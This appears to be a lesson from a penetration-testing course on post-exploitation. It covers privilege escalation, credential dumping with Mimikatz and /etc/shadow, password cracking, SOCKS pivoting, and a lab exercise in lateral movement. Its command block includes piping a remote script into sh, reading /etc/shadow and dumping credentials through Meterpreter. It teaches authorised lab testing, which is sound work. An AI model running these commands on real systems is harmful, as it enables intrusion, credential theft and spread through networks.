Getting a shell is step one. Post-exploitation determines what you can access and how far you can move through the network. Today covers privilege escalation, credential dumping, pivoting, and persistence — all documented for the final report.
A low-privilege shell is rarely enough. Look for SUID/SGID binaries, writable cron jobs, weak sudo rules, world-writable /etc/passwd, and kernel exploits. Tools like LinPEAS and Linux Smart Enumeration automate the search. GTFOBins documents how to escalate with specific binaries like find, vim, and python.
On Windows, check for unquoted service paths, weak service permissions, AlwaysInstallElevated registry keys, and token impersonation opportunities. WinPEAS, PowerUp, and Seatbelt automate enumeration. Meterpreter's 'getsystem' tries multiple escalation techniques automatically.
Once root or SYSTEM is obtained, extract credentials (Mimikatz on Windows, /etc/shadow on Linux) and use them to move to other machines. Port-forwarding and SOCKS proxies let you reach network segments that aren't directly accessible. Document every machine you touch — scope creep is a serious professional and legal issue.
# Linux: find SUID binaries
find / -perm -u=s -type f 2>/dev/null
# Linux: check sudo permissions
sudo -l
# Run LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Windows Meterpreter privilege escalation
meterpreter> getsystem
meterpreter> load kiwi
meterpreter> creds_all
# Pivot: set up SOCKS proxy via Meterpreter
meterpreter> run auxiliary/server/socks_proxy SRVPORT=1080 VERSION=5
# Linux password hashes
cat /etc/shadow
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt
Compromise a second machine on your lab network using credentials extracted from the first. Show the full lateral movement path in a network diagram.